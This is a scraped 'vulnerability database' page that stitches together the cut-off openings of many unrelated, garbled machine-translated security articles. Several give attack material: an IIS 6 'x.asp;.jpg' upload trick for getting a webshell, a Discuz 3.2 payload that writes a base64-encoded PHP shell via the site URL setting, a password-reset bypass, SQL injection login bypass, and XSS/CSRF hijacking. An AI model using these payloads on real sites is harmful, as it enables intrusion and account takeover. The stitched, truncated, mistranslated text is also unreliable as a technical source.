vulnerability database

The original hacker x file 8th, the copyright belongs to the magazine all.Using Internet Explorer Object Data Vulnerability system to make new Web TrojanLcxThis August 20, Microsoft unveiled an important vulnerability--internet Explorer Object Data remote execution vulnerability with the highest severity rating. This is a good thing for the Web Trojan enthusiasts

Release date:Vulnerability version: 7. x-1.x vulnerability Description: Drupal is an open source CMS, can be used as a variety of website content management platform. Drupal's BrowserID (Mozilla Persona) module has the Cross-Site Request Forgery Vulnerability and Security Bypass Vulnerability. Attackers can exploit these vulnerabilities to bypass security restr

Upload Vulnerability:Vulnerability page:/up/add. asp Method of exploits: add a vulnerability page address after the message book, for example, http: // localhost/up/add. asp, Attackers can exploit the parsing vulnerability of iis6.0 to construct an image trojan named x.asp;.jpg. Upload directly. Obtain webshell,For webshell address: The default value is/up/previusfile/07020.(upload the large and small file

Vulnerabilities will always exist, not developer negligence, but some of the vulnerabilities of the situation is very special, it may be very few people, or only one of the 100,000 people will encounter, or think of this situation, or do so, completely in the developer's unexpected, resulting in a loophole.In the process, the business, this vulnerability is often encountered, not uncommon. This loophole is also a way for the discovery to profit, so se

Create users and OpenVAS vulnerability scan in the basic openvas vulnerability scan tutorialHow to create a user OpenVAS Management Service By default, OpenVAS creates only one user named admin and is an administrator user (with the highest permissions ). If you want to log on to another client, you cannot access the client as an administrator. Otherwise, the server becomes messy and cannot be managed. Ther

Recently, the school conducted a security grade assessment, I was called to say that I wrote a site there is an IFRAME injection vulnerability, the page is the error page. I then used Netsparker scan my website, I found the error page there is a loophole, I write the site, in order to easily know the current program error, wrote an error page, the code is as followsif (! IsPostBack) { div_error. InnerHtml = application["Error"]. ToSt

In June on the black defense to see "dynamic network 7.1 loopholes found in the world," a paper, said admin_postings.asp file There is an injection vulnerability, but the prerequisite is to have the super owner or front desk administrator privileges. I think of the previous discovery of the 7.x version of the network has a foreground privilege elevation loophole, just can be combined to use. This foreground privilege elevation

Discuz3.2 vulnerability File Inclusion Vulnerability shell in the background Because the topic was not created Static nameThis vulnerability is caused by any restrictions1. Global-> site information Website URL: Http://www.comsenz.com? Php file_put_contents ('0. php', base64_decode ('pd9wahagqgv2ywwojf9qt1nuw2fdktsgpz4 = ');?> 2. Tools> Update Cache

Yilong loan User Password Change Vulnerability (logical vulnerability not cracked) On the official website of Yilong loan, there is a random user password change vulnerability when retrieving the password. Step 1: retrieve the password, click "Send verification code", enter the Incorrect verification code, and capture the packet: Write down the error return

Analysis of Common PHP program vulnerability attacks and php program vulnerability attacks Summary: PHP programs are not solid. With the widespread use of PHP, some hackers do not want to bother with PHP, and attacks by using PHP program vulnerabilities are one of them. In this section, we will analyze the security of PHP in terms of global variables, remote files, file uploads, library files, Session files

Label:Implementation of login background with SQL injection vulnerabilityFont: [Increase decrease] Type: Reprint time: 2012-01-12 I want to commentWork needs, have to take a good tutorial on the Web security related knowledge, so essays this article, right when summed up, there is no meaning. Reading this article, I assume that the reader has the experience of writing SQL statements, or can read SQL statements as early as in 02, foreign about the SQL injection

attacks.Method:1. The escape character is not properly filtered when the user's input is not filtered for the escape character, this form of injection attack occurs and it is passed to an SQL statement. This causes the end user of the application to manipulate the statements on the database. 　　For example, the following line of code demonstrates the vulnerability: statement: = "SELECT * from users WHERE na

Use the QQ space storage XSS vulnerability with the CSRF vulnerability to hijack other website accounts (sensitive tag 403 interception can bypass \ 403 bypass) 1. All tests are from the fuzz test (all are determined based on the returned content. If any judgment error occurs, sorry)2. the XSS output point is not filtered. However, if a sensitive tag keyword is entered, the Server Returns Error 403, but it

DeDeCMS is hacked every time !! DEDECMS vulnerability scan and dedecms vulnerability scan On the basis of dedecms, a classified information platform was created in the form of plug-ins, resulting in continuous problems. Every time I go up and scan, a bunch of vulnerabilities and dangerous code are completely hacked. The reason is, 1) the openness of open-source programs allows everyone to read the source

Virus: "MS08-067 vulnerability Virus Variant B" is a hacker program that exploits Microsoft MS08-067 vulnerability to launch attacks. This program starts the attack thread to randomly generate an IP address and tries to launch an attack on this IP address. If the system does not have a MS08-067 patch, it may be attacked. After successful attack, a Trojan of 6767.exe will be downloaded, which will modify the

To do web development, we often do code walk-through, many times, we will check some core features, or often appear the logic of loopholes. Along with the technical team's growth, the crew technology matures. Common fool-type SQL injection vulnerabilities, and XSS vulnerabilities. will be less, but we will also find that some emerging hidden vulnerabilities occasionally emerge. These vulnerabilities are more from developers, to a function, common module function design is insufficient, left the

I. Purpose of the experiment Understanding Dynamic Network Forum 8.2 Principle Two, experiment principle Dynamic Network Forum User login process, filtering lax, resulting in injection, elevated permissions. The vulnerability exists in the login.asp of the source file. Third, the experimental environment This machine: 192.168.1.2Target machine: 192.168.1.3 Four, experiment steps First, the normal registration login1, visit Address: http://192.168.1

Use the following code: This code allows you to hide the HTML code in front of the page, and you can only see the code that executes inside the JavaScript statement after you run it. And after refreshing, you can no longer see the source code of the site, and can use JavaScript to execute arbitrary code. The best time to hang a horse is to be missed. Test method: Save the above code for an HTML page. If you only see the above time, it will prove that your IE also has this

Any file Upload vulnerability File Upload Vulnerability (Upload Attack) is because the file Upload function implementation code does not strictly limit the user's uploaded file suffix and file type, resulting in allowing attackers to upload arbitrary php files to a directory that can be accessed through the Web, and to pass these files to the PHP interpreter. You can execute arbitrary PHP scripts on the re

cross-site vulnerability other than a target. If we are going to infiltrate a site, we construct a Web page that has a cross-site vulnerability and then construct a cross-site statement that deceives the administrator of the target server by combining other technologies, such as social engineering, to open Types of XSS One is the storage type: that is, the code is written to the